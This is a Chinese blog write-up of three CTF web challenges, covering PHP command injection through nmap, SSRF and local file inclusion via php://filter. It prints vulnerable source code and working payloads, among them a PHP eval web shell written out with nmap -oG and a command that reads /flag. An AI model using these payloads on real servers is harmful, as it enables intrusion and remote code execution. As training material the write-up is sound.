BUUCTF刷题记录

[BUUCTF 2018]Online Tool

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

首先,它从GET请求中获取名为"host"的参数,并将其赋值给变量$host。

接下来,代码使用escapeshellarg()函数对$host进行转义,以防止命令注入攻击。这个函数会在字符串的开头和结尾添加单引号,会将其中的单引号字符'加一个转义符,再加上一对单引号进行链接单,转义为'\''

然后,代码使用escapeshellcmd()函数对host进行更严格的过滤。这个函数会删除字符串中的一些特殊字符,包括`\0`、`\n`、`\r`、`\t`、`\`、`;`、`|`、`&`和``,防止恶意用户利用这些特殊字符执行任意的Shell命令。(所以&&和||这些是用不了了)

接下来,代码生成一个唯一的沙盒目录名。它使用md5()函数生成一个哈希值,结合字符串"glzjin"和客户端的IP地址(通过$_SERVER['REMOTE_ADDR']获取),以确保沙盒目录名的唯一性。(生成目录名)

然后,代码使用mkdir()函数创建了一个以沙盒目录名为名称的目录。如果目录已存在,则会返回警告,使用@符号可以抑制这个警告。(生成目录)

通过chdir()函数将当前目录切换到沙盒目录。

最后,代码使用system()函数执行了一个Nmap命令,扫描目标主机。Nmap命令的参数包括一些选项(如-T5-sT-Pn--host-timeout 2-F)以及$host变量(经过转义和过滤后的)。

扫描结果通过echo语句输出到浏览器。

第一个if语句没有else,影响不大,第二个if语句用了escapeshellarg和escapeshellcmd函数进行过滤,但是这两个函数共同使用时就会产生逻辑漏洞;这里用的是nmap命令。可以使用nmap的写文件功能写入一句话木马或者利用system来RCE,Nmap命令行中加入"-oG <filename>"选项,则Nmap会将扫描结果写入到指定的文件中,而不是在终端输出。

构造payload:

?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '

把这串东西拼接到靶场地址后面,蚁剑链接http://靶场地址/沙箱地址/hack.php

蚁剑链接flag在根目录下

直接RCE:

?host=' <?php echo `cat /flag`;?> -oG a.php '

然后访问沙县目录下的a.php

相关文章:

PHP escapeshellarg()+escapeshellcmd() 之殇

BUUCTF [BUUCTF 2018] Online Tool_buuctf 2018 web 在线工具-CSDN博客

[HNCTF 2022 WEEK2]ez_ssrf

<?php

highlight_file(__FILE__);
error_reporting(0);

$data=base64_decode($_GET['data']);
$host=$_GET['host'];
$port=$_GET['port'];

$fp=fsockopen($host,intval($port),$error,$errstr,30);
if(!$fp) {
    die();
}
else {
    fwrite($fp,$data);
    while(!feof($data))
    {
        echo fgets($fp,128);
    }
    fclose($fp);
}

fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 base64 编码的数据解码,并将数据写入到连接的 socket 中。

手写127.0.0.1请求头格式构建一个 HTTP GET 请求,请求的目标地址是 127.0.0.1 上的 flag.php 文件,然后base64编码

GET /flag.php HTTP/1.1

Host: 127.0.0.1

Connection: Close

Payload:

/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

相关文章:

https://www.cnblogs.com/xuey/p/8463009.html

[BSidesCF 2020]Had a bad day

点击按钮可以看猫狗图片,由category参数后的文件名控制,但是无法直接读取flag文件或者index文件,这里尝试伪协议读取index.php文件:

/?category=php://filter/read=convert.base64-encode/resource=index

查看源码再复制

解码后看见关键代码:

<?php

$file = $_GET['category'];

if(isset($file))

{

if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){

include ($file . '.php');

}

else{

echo "Sorry, we currently only support woofers and meowers.";

}

}

?>

代码从GET请求中获取名为"category"的参数,并将其赋值给变量file,接下来代码检查file变量是否已设置。如果已设置,则继续执行。否则,代码不会执行任何操作。

然后,代码使用strpos()函数检查file变量是否包含"woofers"、"meowers"或"index"子字符串。如果包含其中之一,则通过include()函数加载相应的PHP文件。例如,如果file的值为"woofers",则代码将加载woofers.php文件。如果$file的值不包含这些子字符串,则代码返回一个错误消息,指示当前仅支持woofers和meowers分类。

payload:

/?category=php://filter/read=convert.base64-encode/woofers/resource=flag

在路径字符串中使用php://filter/read=convert.base64-encode/woofers/resource=flag时,woofers被包含在字符串中,因此会触发条件语句执行文件包含命令。由于这个路径中使用了php://filter伪协议,因此include语句会尝试将以Base64编码形式返回的flag.php文件内容解码,并将其作为PHP代码执行,读取的实际上是根目录下的flag.php文件

相关推荐
EasyNVR1 小时前
NVR管理平台EasyNVR多个NVR同时管理:全方位安防监控视频融合云平台方案
安全·音视频·监控·视频监控
黑客Ash4 小时前
【D01】网络安全概论
网络·安全·web安全·php
长亭外的少年5 小时前
Kotlin 编译失败问题及解决方案:从守护进程到 Gradle 配置
android·开发语言·kotlin
阿龟在奔跑5 小时前
引用类型的局部变量线程安全问题分析——以多线程对方法局部变量List类型对象实例的add、remove操作为例
java·jvm·安全·list
.Ayang5 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang5 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
好想打kuo碎6 小时前
1、HCIP之RSTP协议与STP相关安全配置
网络·安全
网络安全-老纪6 小时前
iOS应用网络安全之HTTPS
web安全·ios·https
周全全6 小时前
Spring Boot + Vue 基于 RSA 的用户身份认证加密机制实现
java·vue.js·spring boot·安全·php